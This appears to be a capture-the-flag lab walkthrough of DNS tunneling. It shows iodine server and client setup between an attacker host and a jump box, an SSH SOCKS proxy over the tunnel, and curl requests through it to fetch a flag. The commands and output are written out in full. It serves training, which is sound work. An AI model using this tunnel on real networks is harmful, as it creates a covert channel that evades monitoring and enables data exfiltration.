DNS tunneling

This technique is also known as TCP over DNS, where an attacker encapsulates other protocols, such as HTTP requests, over the DNS protocol using the DNS Data Exfiltration technique. DNS Tunneling establishes a communication channel where data is sent and received continuously.

Star iodined server on the thm attacker host:

thm@attacker$ sudo iodined -f -c -P thmpass att.tunnel.com                                                                                                                                                                     
Opened dns0
Setting IP of dns0 to
Setting MTU of dns0 to 1130
Opened IPv4 UDP socket
Listening to dns for domain att.tunnel.com

Start iodine client on the jump host:

thm@jump-box:~$ sudo iodine -P thmpass att.tunnel.com
[sudo] password for thm: 
Opened dns0
Opened IPv4 UDP socket
Sending DNS queries for att.tunnel.com to
Autodetecting DNS query type (use -T to override).
Using DNS type NULL queries
Version ok, both using protocol v 0x00000502. You are user #0
Setting IP of dns0 to
Setting MTU of dns0 to 1130
Server tunnel IP is
Testing raw UDP data to the server (skip with -r)
Server is at, trying raw login: OK
Sending raw traffic directly to
Connection setup complete, transmitting data.
Detaching from terminal...

Start another terminal and jump to the attacker host. SSH over DNS:

thm@attacker:~$ sudo ssh thm@ -4 -f -N -D 1080
[sudo] password for thm: 
The authenticity of host ' (' can't be established.
ECDSA key fingerprint is SHA256:Ks0kFNo7GTsv8uM8bW78FwCCXjvouzDDmATnx1NhbIs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
thm@'s password: 

With this connection to the jump host over the dns0 network, we can access resources:

thm@attacker:~$ curl --socks5
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<address>Apache/2.4.41 (Ubuntu) Server at Port 80</address>

Get the flag:

thm@attacker:~$ curl --socks5